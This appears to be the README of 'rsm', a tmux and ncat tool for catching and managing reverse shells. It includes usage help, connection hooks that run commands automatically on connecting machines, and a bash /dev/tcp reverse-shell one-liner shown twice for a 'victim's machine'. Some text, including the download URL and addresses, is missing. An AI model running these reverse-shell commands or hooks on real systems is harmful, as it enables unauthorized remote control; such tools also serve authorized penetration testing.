rsm copied to clipboard
Reverse shell manager using tmux and ncat
A simple reverse shell manager using tmux
and ncat
curl -o "$BIN_PATH"
chmod +x "$BIN_PATH"
Quick Start
Listen on a port and attach to rsm tmux session:
rsm 14641
creates it's own tmux socket, so it will not mess up with your default tmux sessions. -
On victim's machine, launch a reverse shell:
bash -c 'bash -i >& /dev/tcp/ 0<&1'
Once it connects back to the
will create a new tmux window to handle the TCP connection. You can simply switch to that window and start typing commands.
$ rsm --help
rsm PORT Start a reverse shell listener on PORT
rsm d[etached] PORT Start a detached reverse shell listener on PORT
rsm l[ist] List active rsm listeners
rsm i[nfo] PORT Show details of listener on PORT
rsm i[nfo] Show details of all rsm listeners
rsm s[top] PORT Stop a rsm listener on PORT
rsm s[top] Stop all rsm listeners
rsm a[ttach] PORT Attach to a rsm session listening on PORT
rsm a[ttach] Attach to the last rsm session
rsm c[lean] PORT Clean sockets for PORT
rsm c[lean] Clean all sockets
rsm h[elp] Show this help message
-d, --dir DIR Where the rsm sockets be stored (default: /tmp/.rsm)
-n, --max-conn N Maximum number of connections (default: 128)
-r, --max-recv N Maximum receiving MB (default: 64)
-c, --hook CMD Command to eval when a client connects
-w, --with CMD Command to eval when rsm starts
--ncat-flags FLAGS Additional command line flags for ncat
--tmux-flags FLAGS Additional command line flags for tmux
-h, --help Show this help message
Connection Hooks
You are able to run custom command to handle a client connection:
rsm detached 12345 --hook 'echo "Hello, you are from ${IP}:${PORT}!"; exit'
ncat 12345
# Hello, you are from!
With this feature, you can run commands automatically when a reverse shell connects back:
rsm detached 12345 --hook "echo 'echo SomeContent > \$HOME/SomeFile; exit'; exit"
bash -c 'bash -i >& /dev/tcp/ 0<&1'
cat ~/SomeFile # SomeContent